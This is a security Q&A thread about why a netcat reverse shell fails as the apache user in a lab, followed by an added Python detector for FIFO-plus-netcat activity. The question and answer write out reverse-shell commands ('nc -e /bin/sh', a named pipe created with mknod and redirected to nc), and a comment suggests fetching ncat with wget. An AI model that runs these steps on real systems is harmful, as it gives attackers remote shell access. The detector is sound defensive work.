
While practicing exploitation on a lab, I managed to get the ability to execute PHP code, which allowed me to execute system commands through shell_exec on a web server. The apache user has /sbin/nologin assigned as its shell.
I have tried using the command nc -e /bin/sh [ip] [port], but it fails. Using netcat without starting a shell, however, succeeds. I assumed that this was because having the shell set to /sbin/nologin means I cannot start it. However, if I use an executable that performs execve("/bin/sh"), such as those found in msfvenom payload executables, it succeeds.

Another reason I assumed the nologin shell disallows a user from starting an interactive shell is that trying the netcat reverse shell with a user who has /bin/sh configured as its shell succeeds. I am confused about at what phase the check for permission to start a shell happens, because I am still able to start one through binary executables.

chicks
MykelXIII

/sbin/nologin forbids console/ssh logins, but if you get access through an exploit, you can still run /bin/sh. It may be that nc on this box doesn't allow -e. There is a tty trick to do it anyway (can't find it just now). Alternatively, use wget to fetch a ncat static binary from your own web server. – paj28 Jul 31 '16 at 11:43

1 Answer

Most probably, your problem has nothing to do with the login shell. Having a version of nc that supports the -e option is a great exception; most netcats don't support -e. This article explains what you have to do in this case. You have to split the shell creation into two parts: first you create a pipe with

mknod /tmp/mypipe p

and then you create the shell by redirecting stdin and stdout to the pipe and thereby to nc.

kaidentity
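The sequence the answer describes (a FIFO created by the web-server account, then nc attached to it) is easy to spot in process-creation telemetry. The following detector is an added example, not code from the thread; it assumes a constructed one-line-per-execve log format ("timestamp user argv..."), a hypothetical SERVICE_USERS set of accounts that should never launch netcat, and a 60-second correlation window.

```python
import os
import re
from datetime import datetime, timedelta

# Constructed execve-style log lines: "<timestamp> <user> <argv...>" (sample values, not a real host).
LOG = """\
2016-07-31T11:40:01 apache /usr/sbin/httpd -DFOREGROUND
2016-07-31T11:41:03 apache mknod /tmp/mypipe p
2016-07-31T11:41:04 apache nc 192.0.2.10 4444
2016-07-31T11:41:04 apache /bin/sh
2016-07-31T11:45:00 alice mkfifo /home/alice/build.fifo
2016-07-31T11:45:02 alice nc 192.0.2.10 4444
2016-07-31T11:50:00 www-data mkfifo /dev/shm/f
2016-07-31T11:50:30 www-data ncat 192.0.2.11 443
"""
SERVICE_USERS = {"apache", "www-data", "nginx"}   # hypothetical: accounts that never need nc
NETCATS = {"nc", "ncat", "netcat"}
WINDOW = timedelta(seconds=60)                      # max gap: FIFO creation -> netcat launch
LINE = re.compile(r"^(\S+) (\S+) (.+)$")

def parse(line):
    ts, user, argv = LINE.match(line).groups()
    return datetime.fromisoformat(ts), user, argv.split()

def fifo_path(argv):
    """Path of the FIFO this execve creates, or None if it is not a FIFO creation."""
    cmd = os.path.basename(argv[0])
    if cmd == "mkfifo" and len(argv) >= 2:
        return argv[1]
    if cmd == "mknod" and len(argv) >= 3 and argv[2] == "p":   # mknod <path> p
        return argv[1]
    return None

def detect(log):
    """Return (user, fifo, netcat_argv) for each service account that creates a FIFO and runs netcat within WINDOW."""
    pending = {}   # user -> (time of FIFO creation, path)
    hits = []
    for line in log.splitlines():
        ts, user, argv = parse(line)
        path = fifo_path(argv)
        if path is not None:
            if user in SERVICE_USERS:
                pending[user] = (ts, path)
            continue
        if os.path.basename(argv[0]) in NETCATS and user in pending:
            t0, path = pending.pop(user)
            if ts - t0 <= WINDOW:
                hits.append((user, path, " ".join(argv)))
    return hits
```

A regular user creating a FIFO for a build pipeline (alice above) is not flagged; only the service accounts are.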